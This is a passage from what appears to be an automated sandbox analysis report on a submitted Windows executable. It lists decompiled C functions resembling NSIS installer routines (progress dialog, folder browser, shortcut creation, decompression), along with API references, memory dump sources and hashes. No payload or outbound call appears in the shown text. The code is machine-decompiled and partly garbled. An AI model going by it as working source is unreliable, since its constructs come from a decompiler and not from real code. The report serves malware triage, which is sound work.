                                                                                                                          					SendMessageA(_t161, 0x2001, _t150, _a12);
                                                                                                                          				}
                                                                                                                          				goto L36;
                                                                                                                          			}




































                                                                                                                          APIs
                                                                                                                          • GetDlgItem.USER32 ref: 00405511
                                                                                                                          • GetDlgItem.USER32 ref: 00405520
                                                                                                                          • GetClientRect.USER32 ref: 0040555D
                                                                                                                          • GetSystemMetrics.USER32 ref: 00405564
                                                                                                                          • SendMessageA.USER32(?,0000101B,00000000,?), ref: 00405585
                                                                                                                          • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405596
                                                                                                                          • SendMessageA.USER32(?,00001001,00000000,?), ref: 004055A9
                                                                                                                          • SendMessageA.USER32(?,00001026,00000000,?), ref: 004055B7
                                                                                                                          • SendMessageA.USER32(?,00001024,00000000,?), ref: 004055CA
                                                                                                                          • ShowWindow.USER32(00000000,?,0000001B,?), ref: 004055EC
                                                                                                                          • ShowWindow.USER32(?,00000008), ref: 00405600
                                                                                                                          • GetDlgItem.USER32 ref: 00405621
                                                                                                                          • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405631
                                                                                                                          • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040564A
                                                                                                                          • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 00405656
                                                                                                                          • GetDlgItem.USER32 ref: 0040552F
                                                                                                                            • Part of subcall function 00404306: SendMessageA.USER32(00000028,?,00000001,00404136), ref: 00404314
                                                                                                                          • GetDlgItem.USER32 ref: 00405672
                                                                                                                          • CreateThread.KERNEL32 ref: 00405680
                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00405687
                                                                                                                          • ShowWindow.USER32(00000000), ref: 004056AA
                                                                                                                          • ShowWindow.USER32(?,00000008), ref: 004056B1
                                                                                                                          • ShowWindow.USER32(00000008), ref: 004056F7
                                                                                                                          • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040572B
                                                                                                                          • CreatePopupMenu.USER32 ref: 0040573C
                                                                                                                          • AppendMenuA.USER32 ref: 00405751
                                                                                                                          • GetWindowRect.USER32 ref: 00405771
                                                                                                                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040578A
                                                                                                                          • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004057C6
                                                                                                                          • OpenClipboard.USER32(00000000), ref: 004057D6
                                                                                                                          • EmptyClipboard.USER32 ref: 004057DC
                                                                                                                          • GlobalAlloc.KERNEL32(00000042,?), ref: 004057E5
                                                                                                                          • GlobalLock.KERNEL32 ref: 004057EF
                                                                                                                          • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405803
                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 0040581C
                                                                                                                          • SetClipboardData.USER32 ref: 00405827
                                                                                                                          • CloseClipboard.USER32 ref: 0040582D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.211058940.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.211048716.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211076911.0000000000408000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211093563.000000000040A000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211104465.000000000041D000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211112400.000000000042C000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211118690.0000000000435000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211124637.0000000000438000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 590372296-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 78%
                                                                                                                          			E00404763(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
                                                                                                                          				signed int _v8;
                                                                                                                          				signed int _v12;
                                                                                                                          				long _v16;
                                                                                                                          				long _v20;
                                                                                                                          				long _v24;
                                                                                                                          				char _v28;
                                                                                                                          				intOrPtr _v32;
                                                                                                                          				long _v36;
                                                                                                                          				char _v40;
                                                                                                                          				unsigned int _v44;
                                                                                                                          				signed int _v48;
                                                                                                                          				CHAR* _v56;
                                                                                                                          				intOrPtr _v60;
                                                                                                                          				intOrPtr _v64;
                                                                                                                          				intOrPtr _v68;
                                                                                                                          				CHAR* _v72;
                                                                                                                          				void _v76;
                                                                                                                          				struct HWND__* _v80;
                                                                                                                          				void* __ebx;
                                                                                                                          				void* __edi;
                                                                                                                          				void* __esi;
                                                                                                                          				intOrPtr _t82;
                                                                                                                          				long _t87;
                                                                                                                          				signed char* _t89;
                                                                                                                          				void* _t95;
                                                                                                                          				signed int _t96;
                                                                                                                          				int _t109;
                                                                                                                          				signed char _t114;
                                                                                                                          				signed int _t118;
                                                                                                                          				struct HWND__** _t122;
                                                                                                                          				intOrPtr* _t138;
                                                                                                                          				CHAR* _t146;
                                                                                                                          				intOrPtr _t147;
                                                                                                                          				unsigned int _t150;
                                                                                                                          				signed int _t152;
                                                                                                                          				unsigned int _t156;
                                                                                                                          				signed int _t158;
                                                                                                                          				signed int* _t159;
                                                                                                                          				signed char* _t160;
                                                                                                                          				struct HWND__* _t165;
                                                                                                                          				struct HWND__* _t166;
                                                                                                                          				int _t168;
                                                                                                                          				unsigned int _t197;
                                                                                                                          
                                                                                                                          				_t156 = __edx;
                                                                                                                          				_t82 =  *0x42a090;
                                                                                                                          				_v32 = _t82;
                                                                                                                          				_t146 = ( *(_t82 + 0x3c) << 0xa) + 0x430000;
                                                                                                                          				_v12 =  *((intOrPtr*)(_t82 + 0x38));
                                                                                                                          				if(_a8 == 0x40b) {
                                                                                                                          					E0040594D(0x3fb, _t146);
                                                                                                                          					E00406528(_t146);
                                                                                                                          				}
                                                                                                                          				_t166 = _a4;
                                                                                                                          				if(_a8 != 0x110) {
                                                                                                                          					L8:
                                                                                                                          					if(_a8 != 0x111) {
                                                                                                                          						L20:
                                                                                                                          						if(_a8 == 0x40f) {
                                                                                                                          							L22:
                                                                                                                          							_v8 = _v8 & 0x00000000;
                                                                                                                          							_v12 = _v12 & 0x00000000;
                                                                                                                          							E0040594D(0x3fb, _t146);
                                                                                                                          							if(E00405CD3(_t185, _t146) == 0) {
                                                                                                                          								_v8 = 1;
                                                                                                                          							}
                                                                                                                          							E0040624D(0x429888, _t146);
                                                                                                                          							_t87 = E00406656(1);
                                                                                                                          							_v16 = _t87;
                                                                                                                          							if(_t87 == 0) {
                                                                                                                          								L30:
                                                                                                                          								E0040624D(0x429888, _t146);
                                                                                                                          								_t89 = E00405C7E(0x429888);
                                                                                                                          								_t158 = 0;
                                                                                                                          								if(_t89 != 0) {
                                                                                                                          									 *_t89 =  *_t89 & 0x00000000;
                                                                                                                          								}
                                                                                                                          								if(GetDiskFreeSpaceA(0x429888,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
                                                                                                                          									goto L35;
                                                                                                                          								} else {
                                                                                                                          									_t168 = 0x400;
                                                                                                                          									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
                                                                                                                          									asm("cdq");
                                                                                                                          									_v48 = _t109;
                                                                                                                          									_v44 = _t156;
                                                                                                                          									_v12 = 1;
                                                                                                                          									goto L36;
                                                                                                                          								}
                                                                                                                          							} else {
                                                                                                                          								_t159 = 0;
                                                                                                                          								if(0 == 0x429888) {
                                                                                                                          									goto L30;
                                                                                                                          								} else {
                                                                                                                          									goto L26;
                                                                                                                          								}
                                                                                                                          								while(1) {
                                                                                                                          									L26:
                                                                                                                          									_t114 = _v16(0x429888,  &_v48,  &_v28,  &_v40);
                                                                                                                          									if(_t114 != 0) {
                                                                                                                          										break;
                                                                                                                          									}
                                                                                                                          									if(_t159 != 0) {
                                                                                                                          										 *_t159 =  *_t159 & _t114;
                                                                                                                          									}
                                                                                                                          									_t160 = E00405C2C(0x429888);
                                                                                                                          									 *_t160 =  *_t160 & 0x00000000;
                                                                                                                          									_t159 = _t160 - 1;
                                                                                                                          									 *_t159 = 0x5c;
                                                                                                                          									if(_t159 != 0x429888) {
                                                                                                                          										continue;
                                                                                                                          									} else {
                                                                                                                          										goto L30;
                                                                                                                          									}
                                                                                                                          								}
                                                                                                                          								_t150 = _v44;
                                                                                                                          								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
                                                                                                                          								_v44 = _t150 >> 0xa;
                                                                                                                          								_v12 = 1;
                                                                                                                          								_t158 = 0;
                                                                                                                          								__eflags = 0;
                                                                                                                          								L35:
                                                                                                                          								_t168 = 0x400;
                                                                                                                          								L36:
                                                                                                                          								_t95 = E00404BF7(5);
                                                                                                                          								if(_v12 != _t158) {
                                                                                                                          									_t197 = _v44;
                                                                                                                          									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
                                                                                                                          										_v8 = 2;
                                                                                                                          									}
                                                                                                                          								}
                                                                                                                          								_t147 =  *0x42ec1c; // 0x82c3c2
                                                                                                                          								if( *((intOrPtr*)(_t147 + 0x10)) != _t158) {
                                                                                                                          									E00404BDF(0x3ff, 0xfffffffb, _t95);
                                                                                                                          									if(_v12 == _t158) {
                                                                                                                          										SetDlgItemTextA(_a4, _t168, 0x429878);
                                                                                                                          									} else {
                                                                                                                          										E00404B1A(_t168, 0xfffffffc, _v48, _v44);
                                                                                                                          									}
                                                                                                                          								}
                                                                                                                          								_t96 = _v8;
                                                                                                                          								 *0x42f504 = _t96;
                                                                                                                          								if(_t96 == _t158) {
                                                                                                                          									_v8 = E0040140B(7);
                                                                                                                          								}
                                                                                                                          								if(( *(_v32 + 0x14) & _t168) != 0) {
                                                                                                                          									_v8 = _t158;
                                                                                                                          								}
                                                                                                                          								E004042F3(0 | _v8 == _t158);
                                                                                                                          								if(_v8 == _t158 &&  *0x42a8a8 == _t158) {
                                                                                                                          									E004046BC();
                                                                                                                          								}
                                                                                                                          								 *0x42a8a8 = _t158;
                                                                                                                          								goto L53;
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						_t185 = _a8 - 0x405;
                                                                                                                          						if(_a8 != 0x405) {
                                                                                                                          							goto L53;
                                                                                                                          						}
                                                                                                                          						goto L22;
                                                                                                                          					}
                                                                                                                          					_t118 = _a12 & 0x0000ffff;
                                                                                                                          					if(_t118 != 0x3fb) {
                                                                                                                          						L12:
                                                                                                                          						if(_t118 == 0x3e9) {
                                                                                                                          							_t152 = 7;
                                                                                                                          							memset( &_v76, 0, _t152 << 2);
                                                                                                                          							_v80 = _t166;
                                                                                                                          							_v72 = 0x42a8b8;
                                                                                                                          							_v60 = E00404AB4;
                                                                                                                          							_v56 = _t146;
                                                                                                                          							_v68 = E004062E0(_t146, 0x42a8b8, _t166, 0x429c90, _v12);
                                                                                                                          							_t122 =  &_v80;
                                                                                                                          							_v64 = 0x41;
                                                                                                                          							__imp__SHBrowseForFolderA(_t122);
                                                                                                                          							if(_t122 == 0) {
                                                                                                                          								_a8 = 0x40f;
                                                                                                                          							} else {
                                                                                                                          								__imp__CoTaskMemFree(_t122);
                                                                                                                          								E00405BE5(_t146);
                                                                                                                          								_t125 =  *((intOrPtr*)( *0x42f454 + 0x11c));
                                                                                                                          								if( *((intOrPtr*)( *0x42f454 + 0x11c)) != 0 && _t146 == "C:\\Users\\hardz\\AppData\\Local\\Temp") {
                                                                                                                          									E004062E0(_t146, 0x42a8b8, _t166, 0, _t125);
                                                                                                                          									if(lstrcmpiA(0x42e3e0, 0x42a8b8) != 0) {
                                                                                                                          										lstrcatA(_t146, 0x42e3e0);
                                                                                                                          									}
                                                                                                                          								}
                                                                                                                          								 *0x42a8a8 =  *0x42a8a8 + 1;
                                                                                                                          								SetDlgItemTextA(_t166, 0x3fb, _t146);
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						goto L20;
                                                                                                                          					}
                                                                                                                          					if(_a12 >> 0x10 != 0x300) {
                                                                                                                          						goto L53;
                                                                                                                          					}
                                                                                                                          					_a8 = 0x40f;
                                                                                                                          					goto L12;
                                                                                                                          				} else {
                                                                                                                          					_t165 = GetDlgItem(_t166, 0x3fb);
                                                                                                                          					if(E00405C52(_t146) != 0 && E00405C7E(_t146) == 0) {
                                                                                                                          						E00405BE5(_t146);
                                                                                                                          					}
                                                                                                                          					 *0x42ec18 = _t166;
                                                                                                                          					SetWindowTextA(_t165, _t146);
                                                                                                                          					_push( *((intOrPtr*)(_a16 + 0x34)));
                                                                                                                          					_push(1);
                                                                                                                          					E004042D1(_t166);
                                                                                                                          					_push( *((intOrPtr*)(_a16 + 0x30)));
                                                                                                                          					_push(0x14);
                                                                                                                          					E004042D1(_t166);
                                                                                                                          					E00404306(_t165);
                                                                                                                          					_t138 = E00406656(8);
                                                                                                                          					if(_t138 == 0) {
                                                                                                                          						L53:
                                                                                                                          						return E00404338(_a8, _a12, _a16);
                                                                                                                          					} else {
                                                                                                                          						 *_t138(_t165, 1);
                                                                                                                          						goto L8;
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          			}


                                                                                                                          APIs
                                                                                                                          • GetDlgItem.USER32 ref: 004047B2
                                                                                                                          • SetWindowTextA.USER32(00000000,?), ref: 004047DC
                                                                                                                          • SHBrowseForFolderA.SHELL32(?,00429C90,?), ref: 0040488D
                                                                                                                          • CoTaskMemFree.OLE32(00000000), ref: 00404898
                                                                                                                          • lstrcmpiA.KERNEL32(Call,0042A8B8,00000000,?,?), ref: 004048CA
                                                                                                                          • lstrcatA.KERNEL32(?,Call), ref: 004048D6
                                                                                                                          • SetDlgItemTextA.USER32 ref: 004048E8
                                                                                                                            • Part of subcall function 0040594D: GetDlgItemTextA.USER32 ref: 00405960
                                                                                                                            • Part of subcall function 00406528: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\lpdKSOB78u.exe" ,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000,00403461,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403698,?,00000007,00000009,0000000B), ref: 00406580
                                                                                                                            • Part of subcall function 00406528: CharNextA.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 0040658D
                                                                                                                            • Part of subcall function 00406528: CharNextA.USER32(?,"C:\Users\user\Desktop\lpdKSOB78u.exe" ,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000,00403461,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403698,?,00000007,00000009,0000000B), ref: 00406592
                                                                                                                            • Part of subcall function 00406528: CharPrevA.USER32(?,?,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000,00403461,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403698,?,00000007,00000009,0000000B), ref: 004065A2
                                                                                                                          • GetDiskFreeSpaceA.KERNEL32(00429888,?,?,0000040F,?,00429888,00429888,?,00000001,00429888,?,?,000003FB,?), ref: 004049A6
                                                                                                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004049C1
                                                                                                                            • Part of subcall function 00404B1A: lstrlenA.KERNEL32(0042A8B8,0042A8B8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404A35,000000DF,00000000,00000400,?), ref: 00404BB8
                                                                                                                            • Part of subcall function 00404B1A: wsprintfA.USER32 ref: 00404BC0
                                                                                                                            • Part of subcall function 00404B1A: SetDlgItemTextA.USER32 ref: 00404BD3
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.211058940.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.211048716.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211076911.0000000000408000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211093563.000000000040A000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211104465.000000000041D000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211112400.000000000042C000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211118690.0000000000435000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211124637.0000000000438000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                          • String ID: A$C:\Users\user\AppData\Local\Temp$Call
                                                                                                                          • API String ID: 2624150263-2678639445
                                                                                                                          • Opcode ID: 79c2b04a4b296fc05e45a035d0f819eda2b2c317a157a3b831c209e23d1f951a
                                                                                                                          • Instruction ID: b89c9f0b9ad2a5e463b1d4baa2297f7fe0657747611b748bc5d4715ca5df860c
                                                                                                                          • Opcode Fuzzy Hash: 79c2b04a4b296fc05e45a035d0f819eda2b2c317a157a3b831c209e23d1f951a
                                                                                                                          • Instruction Fuzzy Hash: A9A17DB1A00209ABDB11AFA5C941AAF77B8EF84314F14843BF601B62D1DB7C99518F6D
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 74%
                                                                                                                          			E0040216B(void* __eflags) {
                                                                                                                          				signed int _t55;
                                                                                                                          				void* _t59;
                                                                                                                          				intOrPtr* _t63;
                                                                                                                          				intOrPtr _t64;
                                                                                                                          				intOrPtr* _t65;
                                                                                                                          				intOrPtr* _t67;
                                                                                                                          				intOrPtr* _t69;
                                                                                                                          				intOrPtr* _t71;
                                                                                                                          				intOrPtr* _t73;
                                                                                                                          				intOrPtr* _t75;
                                                                                                                          				intOrPtr* _t78;
                                                                                                                          				intOrPtr* _t80;
                                                                                                                          				intOrPtr* _t82;
                                                                                                                          				intOrPtr* _t84;
                                                                                                                          				int _t87;
                                                                                                                          				intOrPtr* _t95;
                                                                                                                          				signed int _t105;
                                                                                                                          				signed int _t109;
                                                                                                                          				void* _t111;
                                                                                                                          
                                                                                                                          				 *(_t111 - 0x38) = E00402BCE(0xfffffff0);
                                                                                                                          				 *(_t111 - 0xc) = E00402BCE(0xffffffdf);
                                                                                                                          				 *((intOrPtr*)(_t111 - 0x88)) = E00402BCE(2);
                                                                                                                          				 *((intOrPtr*)(_t111 - 0x34)) = E00402BCE(0xffffffcd);
                                                                                                                          				 *((intOrPtr*)(_t111 - 0x78)) = E00402BCE(0x45);
                                                                                                                          				_t55 =  *(_t111 - 0x18);
                                                                                                                          				 *(_t111 - 0x90) = _t55 & 0x00000fff;
                                                                                                                          				_t105 = _t55 & 0x00008000;
                                                                                                                          				_t109 = _t55 >> 0x0000000c & 0x00000007;
                                                                                                                          				 *(_t111 - 0x74) = _t55 >> 0x00000010 & 0x0000ffff;
                                                                                                                          				if(E00405C52( *(_t111 - 0xc)) == 0) {
                                                                                                                          					E00402BCE(0x21);
                                                                                                                          				}
                                                                                                                          				_t59 = _t111 + 8;
                                                                                                                          				__imp__CoCreateInstance(0x408524, _t87, 1, 0x408514, _t59);
                                                                                                                          				if(_t59 < _t87) {
                                                                                                                          					L15:
                                                                                                                          					 *((intOrPtr*)(_t111 - 4)) = 1;
                                                                                                                          					_push(0xfffffff0);
                                                                                                                          				} else {
                                                                                                                          					_t63 =  *((intOrPtr*)(_t111 + 8));
                                                                                                                          					_t64 =  *((intOrPtr*)( *_t63))(_t63, 0x408534, _t111 - 0x30);
                                                                                                                          					 *((intOrPtr*)(_t111 - 8)) = _t64;
                                                                                                                          					if(_t64 >= _t87) {
                                                                                                                          						_t67 =  *((intOrPtr*)(_t111 + 8));
                                                                                                                          						 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t67 + 0x50))(_t67,  *(_t111 - 0xc));
                                                                                                                          						if(_t105 == _t87) {
                                                                                                                          							_t84 =  *((intOrPtr*)(_t111 + 8));
                                                                                                                          							 *((intOrPtr*)( *_t84 + 0x24))(_t84, "C:\\Users\\hardz\\AppData\\Local\\Temp");
                                                                                                                          						}
                                                                                                                          						if(_t109 != _t87) {
                                                                                                                          							_t82 =  *((intOrPtr*)(_t111 + 8));
                                                                                                                          							 *((intOrPtr*)( *_t82 + 0x3c))(_t82, _t109);
                                                                                                                          						}
                                                                                                                          						_t69 =  *((intOrPtr*)(_t111 + 8));
                                                                                                                          						 *((intOrPtr*)( *_t69 + 0x34))(_t69,  *(_t111 - 0x74));
                                                                                                                          						_t95 =  *((intOrPtr*)(_t111 - 0x34));
                                                                                                                          						if( *_t95 != _t87) {
                                                                                                                          							_t80 =  *((intOrPtr*)(_t111 + 8));
                                                                                                                          							 *((intOrPtr*)( *_t80 + 0x44))(_t80, _t95,  *(_t111 - 0x90));
                                                                                                                          						}
                                                                                                                          						_t71 =  *((intOrPtr*)(_t111 + 8));
                                                                                                                          						 *((intOrPtr*)( *_t71 + 0x2c))(_t71,  *((intOrPtr*)(_t111 - 0x88)));
                                                                                                                          						_t73 =  *((intOrPtr*)(_t111 + 8));
                                                                                                                          						 *((intOrPtr*)( *_t73 + 0x1c))(_t73,  *((intOrPtr*)(_t111 - 0x78)));
                                                                                                                          						if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
                                                                                                                          							 *((intOrPtr*)(_t111 - 8)) = 0x80004005;
                                                                                                                          							if(MultiByteToWideChar(_t87, _t87,  *(_t111 - 0x38), 0xffffffff,  *(_t111 - 0xc), 0x400) != 0) {
                                                                                                                          								_t78 =  *((intOrPtr*)(_t111 - 0x30));
                                                                                                                          								 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t78 + 0x18))(_t78,  *(_t111 - 0xc), 1);
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						_t75 =  *((intOrPtr*)(_t111 - 0x30));
                                                                                                                          						 *((intOrPtr*)( *_t75 + 8))(_t75);
                                                                                                                          					}
                                                                                                                          					_t65 =  *((intOrPtr*)(_t111 + 8));
                                                                                                                          					 *((intOrPtr*)( *_t65 + 8))(_t65);
                                                                                                                          					if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
                                                                                                                          						_push(0xfffffff4);
                                                                                                                          					} else {
                                                                                                                          						goto L15;
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				E00401423();
                                                                                                                          				 *0x42f4e8 =  *0x42f4e8 +  *((intOrPtr*)(_t111 - 4));
                                                                                                                          				return 0;
                                                                                                                          			}

                                                                                                                          APIs
                                                                                                                          • CoCreateInstance.OLE32(00408524,?,00000001,00408514,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021F0
                                                                                                                          • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00408514,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004022A2
                                                                                                                          Strings
                                                                                                                          • C:\Users\user\AppData\Local\Temp, xrefs: 00402230
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.211058940.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.211048716.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211076911.0000000000408000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211093563.000000000040A000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211104465.000000000041D000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211112400.000000000042C000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211118690.0000000000435000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211124637.0000000000438000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: ByteCharCreateInstanceMultiWide
                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp
                                                                                                                          • API String ID: 123533781-501415292
                                                                                                                          • Opcode ID: 0717a7709797340a5743797a86df642296be39c6595760980035c57ed759ee55
                                                                                                                          • Instruction ID: b205fa0f6c371e5dc37930ac793058e6edb3c03a2887874d4a759486fbbeee3c
                                                                                                                          • Opcode Fuzzy Hash: 0717a7709797340a5743797a86df642296be39c6595760980035c57ed759ee55
                                                                                                                          • Instruction Fuzzy Hash: F5511671A00208AFCB50DFE4CA88E9D7BB6EF48314F2041BAF515EB2D1DA799981CB14
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 39%
                                                                                                                          			E004027A1(char __ebx, char* __edi, char* __esi) {
                                                                                                                          				void* _t19;
                                                                                                                          
                                                                                                                          				if(FindFirstFileA(E00402BCE(2), _t19 - 0x1d0) != 0xffffffff) {
                                                                                                                          					E004061AB(__edi, _t6);
                                                                                                                          					_push(_t19 - 0x1a4);
                                                                                                                          					_push(__esi);
                                                                                                                          					E0040624D();
                                                                                                                          				} else {
                                                                                                                          					 *__edi = __ebx;
                                                                                                                          					 *__esi = __ebx;
                                                                                                                          					 *((intOrPtr*)(_t19 - 4)) = 1;
                                                                                                                          				}
                                                                                                                          				 *0x42f4e8 =  *0x42f4e8 +  *((intOrPtr*)(_t19 - 4));
                                                                                                                          				return 0;
                                                                                                                          			}





                                                                                                                          APIs
                                                                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 004027B0
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.211058940.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.211048716.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211076911.0000000000408000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211093563.000000000040A000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211104465.000000000041D000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211112400.000000000042C000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211118690.0000000000435000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211124637.0000000000438000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: FileFindFirst
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1974802433-0
                                                                                                                          • Opcode ID: 54e83448eb3b122805b370520c8f42e6cd15468a3f63d6e007e8d611046ccabe
                                                                                                                          • Instruction ID: 52cf83cb61f6f27ed997ed7cc61b6938fc353794e3a771b70e6184720e28d6c0
                                                                                                                          • Opcode Fuzzy Hash: 54e83448eb3b122805b370520c8f42e6cd15468a3f63d6e007e8d611046ccabe
                                                                                                                          • Instruction Fuzzy Hash: B3F0A771604110DFD710EB649A49AEE77689F51314F6005BFF102F21C1D6B849469B3A
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 79%
                                                                                                                          			E00406A9B(signed int __ebx, signed int* __esi) {
                                                                                                                          				signed int _t396;
                                                                                                                          				signed int _t425;
                                                                                                                          				signed int _t442;
                                                                                                                          				signed int _t443;
                                                                                                                          				signed int* _t446;
                                                                                                                          				void* _t448;
                                                                                                                          
                                                                                                                          				L0:
                                                                                                                          				while(1) {
                                                                                                                          					L0:
                                                                                                                          					_t446 = __esi;
                                                                                                                          					_t425 = __ebx;
                                                                                                                          					if( *(_t448 - 0x34) == 0) {
                                                                                                                          						break;
                                                                                                                          					}
                                                                                                                          					L55:
                                                                                                                          					__eax =  *(__ebp - 0x38);
                                                                                                                          					 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                                                          					__ecx = __ebx;
                                                                                                                          					 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                                          					 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                                          					 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                                                          					__ebx = __ebx + 8;
                                                                                                                          					while(1) {
                                                                                                                          						L56:
                                                                                                                          						if(__ebx < 0xe) {
                                                                                                                          							goto L0;
                                                                                                                          						}
                                                                                                                          						L57:
                                                                                                                          						__eax =  *(__ebp - 0x40);
                                                                                                                          						__eax =  *(__ebp - 0x40) & 0x00003fff;
                                                                                                                          						__ecx = __eax;
                                                                                                                          						__esi[1] = __eax;
                                                                                                                          						__ecx = __eax & 0x0000001f;
                                                                                                                          						if(__cl > 0x1d) {
                                                                                                                          							L9:
                                                                                                                          							_t443 = _t442 | 0xffffffff;
                                                                                                                          							 *_t446 = 0x11;
                                                                                                                          							L10:
                                                                                                                          							_t446[0x147] =  *(_t448 - 0x40);
                                                                                                                          							_t446[0x146] = _t425;
                                                                                                                          							( *(_t448 + 8))[1] =  *(_t448 - 0x34);
                                                                                                                          							L11:
                                                                                                                          							 *( *(_t448 + 8)) =  *(_t448 - 0x38);
                                                                                                                          							_t446[0x26ea] =  *(_t448 - 0x30);
                                                                                                                          							E0040720A( *(_t448 + 8));
                                                                                                                          							return _t443;
                                                                                                                          						}
                                                                                                                          						L58:
                                                                                                                          						__eax = __eax & 0x000003e0;
                                                                                                                          						if(__eax > 0x3a0) {
                                                                                                                          							goto L9;
                                                                                                                          						}
                                                                                                                          						L59:
                                                                                                                          						 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 0xe;
                                                                                                                          						__ebx = __ebx - 0xe;
                                                                                                                          						_t94 =  &(__esi[2]);
                                                                                                                          						 *_t94 = __esi[2] & 0x00000000;
